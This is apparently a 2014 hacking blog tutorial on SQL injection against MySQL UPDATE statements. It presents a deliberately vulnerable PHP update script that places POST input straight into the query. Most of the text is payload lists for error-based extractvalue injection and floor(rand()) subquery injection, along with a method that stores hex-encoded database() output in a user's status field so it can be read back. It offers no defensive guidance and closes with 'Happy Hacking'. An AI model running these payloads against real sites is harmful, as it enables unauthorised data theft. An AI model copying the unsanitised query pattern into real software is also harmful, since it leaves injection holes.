Well the name itself say everything so i guess you dont need to be clerified what we are upto. But still for a small explaination, we will be injecting this time in Update query.


okay first thing you should remember dont try those other testing techniques with delete query else you will end up changing the whole table of the website. Now the question arise!! how will you know i the query in which you are going to inject is a updation query??

Well the answer is pretty simple "Common Sense". It really depends on the action you are performing using the form or any other way. What you really need to know is that what ever action you are performing if that is updating something then it should be the Update Query injection type.

You can achieve this using the following Injections
1. Xpath Injection
2. Sub Query Injection
3. Tempering the Update Query input values to get the Output.
4. Blind Injection

I strongly Suggest you to read XPATH Injection and Sub-Query Injection, as over here i wont be discussing in detail Of first two injections. Here we will discuss only some minor change in the injection and other things will remain same.

Let us take a vulnerable Updation script, and start exploring it.

Example:
$status=$_POST['status'];
$current_user = $_SESSION['username'];
$query="update users set status='$status' where username='$current_user'";
if (!mysql_query($query,$conn))
echo "Error While Updation process : " . mysql_error();
else
echo "Updated Sucessfully
";

Exploitation using XPATH injection.

It will work when the developer have inserted the error function over there. else only 3rd injection will work

Query:
update users set status='$status' where username='$current_user';
Injection in variable Status
' extractvalue(0x0a,concat(0x0a,(select database()))) '
" extractvalue(0x0a,concat(0x0a,(select database()))) "
' extractvalue(0x0a,concat(0x0a,(select database())))--+
" extractvalue(0x0a,concat(0x0a,(select database())))--+
' extractvalue(0x0a,concat(0x0a,(select database())))#
" extractvalue(0x0a,concat(0x0a,(select database())))#
' extractvalue(0x0a,concat(0x0a,(select database())))--
" extractvalue(0x0a,concat(0x0a,(select database())))--

Now lets see what will the query passed. For the above given Query first injection will work.
$status = ' extractvalue(0x0a,concat(0x0a,(select database()))) '
update users set status='' extractvalue(0x0a,concat(0x0a,(select database()))) '' where username='$current_user';

So actually the above query will output the data in form of error. for rest of Exploitation using XPATH read XPATH Injection

Exploitation using Sub-Query Injection.

update users set status='$status' where username='$current_user'

Injection in variable Status
' (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) '
" (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) "
' (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x)--+
" (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x)--+
' (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x)#
" (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x)#
' (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x)--
" (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x)--

Now lets see what will the query passed. For the above given Query first injection will work.

update users set status='' (select 1 from (select count(*),Concat((select database()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y)x) '' where username='$current_user';

So actually the above query will output the data in form of error. for rest of Exploitation using Sub Query Injection. But it will only work when the developer is printing any error. So now lets start with our 3rd method.

Tempering the Update Query input

Well this time we are not going to create any error assuming that the developer is not giving any error. So we will get the output by inserting the injection and then update it. After that we will check the updated value to get the data.

Actually because of lack of my own knowledge or lack of Concatination operator in MySQL this task is not going to be very easy. There a loads of other ways to inject into a Update Query but i suppose not to discuss them here. Well we will now get the output in Numeric value, for that we will use ' ' to add and we will convert our values into hex to get the output in numeric value, we can also use ASCII function for the same approach but ASCII makes the process slower and lengthy. On the same time there are many other methods to do it. But right now i find this one to be the best as of i got. so let us continue with this.

Query:
update users set status='$status' where username='$current_user'

Our Input is going to $status variable. Now we will first try and get the count of characters in current database() string.

Injection:
' length(database()) '

so now lets see what will happen on the query side.

update users set status='' length(database()) '' where username='$current_user'

Let us assume the Database name is "target" so now if we check the updated value it will show us 6 over there.

Now let us get the current database name. What we will do is we will convert the name to hex to get the data in numeric value.

Getting output using Hex.

injection:
' hex(database()) '
Query Part:
update users set status='' hex(database()) '' where username='$current_user'

The value '746172676574' will be updated so if we unhex this value. we will get that the current database name is 'target'. That was easy but the problem with Hex is that some character like 'L' is 6C which will then be truncated so we can use hex function twice if the name is not complete, still if we dont get it completely then we can use the substring function to get 3 characters at a time.

Getting database() by hex encoding it twice.

injection:
' hex(hex(substring(database(),1,3))) '
' hex(hex(substring(database(),3,3))) '
Query Part:
update users set status='' hex(hex(substring(database(),1,3))) '' where username='$current_user'
update users set status='' hex(hex(substring(database(),3,3))) '' where username='$current_user'

Okay now we can continue dumping the other part in the same manner just using the basic tricks, and the injection will remain the same. If you dont understand the rest part of exploitation read the Basic SQL Injection and death row injection again, and most importantly use your mind.

Happy Hacking.

Author : Zenodermus Javanicus
Date : 2014-04-06